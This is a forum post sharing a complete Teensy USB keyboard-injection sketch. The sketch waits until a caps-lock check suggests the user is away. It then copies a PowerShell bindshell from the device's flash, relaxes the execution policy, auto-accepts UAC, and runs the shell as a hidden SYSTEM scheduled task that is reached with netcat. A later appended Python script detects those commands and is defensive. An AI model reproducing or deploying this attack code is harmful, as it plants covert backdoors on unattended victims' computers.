[Version 1] Teensy Onboard Windows Bindshell


Windows System Onboard Bindshell w/ Caps Lock Trap

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Neither I nor any associates at Hak5 condone misuse of this script or its features.

Download Teensy Sketch: http://info-s3curity.com/teensy/OnboardShell.tar.gz

What is this?

This is an example of an implementation with teensy with ideas given by ReL1k and irongeek which uses the teensy's onboard storage to store a very small and undetectable backdoor bindshell written purely in powershell. The code also uses some basic iterations and use of caps lock to check for user detection: it will turn on caps lock before every user detection check, and if it stays on for 10 iterations (with delay intervals between checks), then it will assume the user is not at the computer, considering most people do not type in all caps and tend to turn it off.

How does it work?

  • The caps lock check utilizes the usb_private library, which contains a ledkeys() function; this function returns an integer based on the lock keys currently found turned on. By creating a statement which contains all possible combinations which include the integer for caps lock, which is 2, we can assume the light will be on. The following snippet accomplishes that with ease:
    if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7)


  • Furthermore, by creating a couple of nested statements with iterations we can use this check a little more thoroughly; by checking multiple times with time between the checks we can ensure that nobody is using the keyboard to type unless they love screaming at people with caps lock. :D
  • Now that we have established a basic way to determine if there is user activity on the computer, which is adjustable depending on how sensitive you need it to be, we will create our attack vector. Let's get a little evil.
  • First we set the teensy in arduino to "Keyboard + Disk(Internal)" mode; this will allow us to use the very small amount of flash memory to store our onboard bindshell which will be copied over to compromise the system. This bindshell is a very simple powershell script which can be run without any AV issues through Windows powershell; we will also utilize Windows task scheduler to both hide the window and run the script with system privileges. This can also be set up by editing the code to run at a given time, but I just have it set up to run the one time when the user is not detected.
  • Once the victim is compromised, we simply netcat into the bindshell on port 12345 and do whatever needs to get done, e.g. nc 192.168.1.100 12345

Requirements

  • A stock teensy development board and Arduino development environment, no soldering or modifications required.
  • Windows 7 victim and user account must have Administrator privileges

Note: Download the full sketch from the link above for use; it also contains the bindshell and setup for internal disk usage.

The code...

/* leg3nd's Windows powershell bindshell w/ system
   Based on PhukdLib by irongeek, powershell bindshell by Rel1k
   Detects user to implement attack based on capslock state
   -MUST BE SET TO KEYBOARD + DISK(INTERNAL) TO WORK
*/

#include "usb_private.h"
#define send_enter() send_keys(KEY_ENTER, 0);
#define send_caps() send_keys(KEY_CAPS_LOCK, 0);
#define send_windows() send_keys(0, 128);
#define send_alt_y() send_keys(KEY_Y, MODIFIERKEY_ALT);
#define send_windows_r() send_keys(KEY_R, MODIFIERKEY_GUI);
int attacked = 0;

void setup(){
  pinMode(11, OUTPUT);
  delay(5000);
  startDelay(30, 25); //startup blink
}

void loop(){
  delay(9000); // Time between attack checks
  if (!IsCapsOn()){send_caps();} //Turn on caps lock for trap
  int userState = 0;
  for (int m=9; m>=0; m--) { //Number of caps lock checks before attack, default = 10 checks
    delay(3000); //Delay between caps lock check iterations
    if (IsCapsOn()){
      delay(3000); //Delay after caps lock is found to be on
    } else {
      userState = userState + 1;
    }
  }
  if (userState>0){
    delay(300000); //Time to wait if user is detected, 300K = 5min
  } else {
    AdminCmd("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"Windows\"') do copy /Y %i\\bind.ps1 %APPDATA%\\bind.ps1 && powershell -Command Set-ExecutionPolicy RemoteSigned");
    delay(200);
    AdminCmd("schtasks /create /tn sysupdate /tr \"powershell -File %APPDATA%\\bind.ps1 -WindowStyle Hidden\" /sc once /ru system /st 23:59:59");
    delay(200);
    AdminCmd("schtasks /run /tn sysupdate");
    delay(999999999); //Just chill, payload already executed (max 11.5 days)
  }
}

//Execute command as administrator
void AdminCmd(char *SomeCommand) {
  send_windows();
  delay(1500); //Delay for start menu to come up
  Keyboard.print(SomeCommand);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  send_enter();
  delay(1000); //Delay for UAC prompt
  send_alt_y();
}

//LED key checking for caps lock
int ledkeys(void){
  return int(keyboard_leds);
}
//Return the state of caps lock, regardless of other lights.
boolean IsCapsOn(){
  if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7){
    return true;
  } else {
    return false;
  }
}

//Key & Utility functions
void startDelay(int count, int dlay){ //debug testing light
 for (int i=0; i<count; i++){
   digitalWrite(11,HIGH);
   delay(dlay);
   digitalWrite(11,LOW);
   delay(100);
 }
}
void release_keys(){
  Keyboard.set_key1(0);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(100);
}
void send_keys(int key, int modifier){
  if(modifier)
     Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(100);
  release_keys();
}

Enjoy responsibly! B)

Edited by leg3nd
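Seen from the defending side, the commands this sketch types show up as process command lines (for example in process-creation auditing). The following is an added detection example, not part of the original post or sketch: it flags a scheduled task created to run PowerShell as SYSTEM from a user-writable path, an on-demand run of that same task, and an execution-policy change. The sample command lines are constructed from the commands shown in the post, and the function names and finding labels are illustrative.

```python
import re

# Constructed command lines (not captured from a real host). The first three
# mirror what the sketch types; the last two are benign look-alikes.
SAMPLE_CMDLINES = [
    r'powershell -Command Set-ExecutionPolicy RemoteSigned',
    r'schtasks /create /tn sysupdate /tr "powershell -File %APPDATA%\bind.ps1 '
    r'-WindowStyle Hidden" /sc once /ru system /st 23:59:59',
    r'schtasks /run /tn sysupdate',
    r'schtasks /create /tn "DailyBackup" /tr "C:\Program Files\Backup\run.exe" '
    r'/sc daily /ru system /st 02:00',
    r'schtasks /run /tn DailyBackup',
]

# Paths a standard user can write to, literal or already expanded.
USER_WRITABLE = re.compile(r'%appdata%|%temp%|\\appdata\\|\\users\\public\\')
RUN_AS_SYSTEM = re.compile(r'/ru\s+"?(?:nt authority\\)?system\b')
TASK_NAME = re.compile(r'/tn\s+"?([^"\s]+)"?', re.I)

def classify(cmdline):
    """Return the set of findings for a single process command line."""
    c = cmdline.lower()
    findings = set()
    if 'set-executionpolicy' in c and re.search(r'remotesigned|unrestricted|bypass', c):
        findings.add('execution-policy-relaxed')
    if 'schtasks' in c and '/create' in c and RUN_AS_SYSTEM.search(c):
        if 'powershell' in c and USER_WRITABLE.search(c):
            findings.add('system-task-user-writable-script')
    if 'schtasks' in c and re.search(r'/run\b', c):
        findings.add('task-run')
    return findings

def scan(cmdlines):
    """Correlate findings in order: a flagged task that is then run on demand."""
    flagged_tasks, alerts = set(), []
    for line in cmdlines:
        findings = classify(line)
        m = TASK_NAME.search(line)
        name = m.group(1).lower() if m else None
        if 'execution-policy-relaxed' in findings:
            alerts.append(('execution-policy-relaxed', None))
        if 'system-task-user-writable-script' in findings and name:
            flagged_tasks.add(name)
            alerts.append(('task-created', name))
        elif 'task-run' in findings and name in flagged_tasks:
            alerts.append(('task-run-after-create', name))
    return alerts

if __name__ == '__main__':
    for alert in scan(SAMPLE_CMDLINES):
        print(alert)
```

The SYSTEM task pointing at a script under a user profile is the strongest of the three signals; the execution-policy change on its own is common in legitimate administration.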

Glad it helps, I'll consider releasing some other sketches when I get some time off summer school. But this same template can be used for the caps lock traps with many different attack vectors, it appears to work very well in the lab and is probably the closest thing to user detection without using a photoresistor or other additional hardware.

Any other ideas throw them my way. Thanks. :)
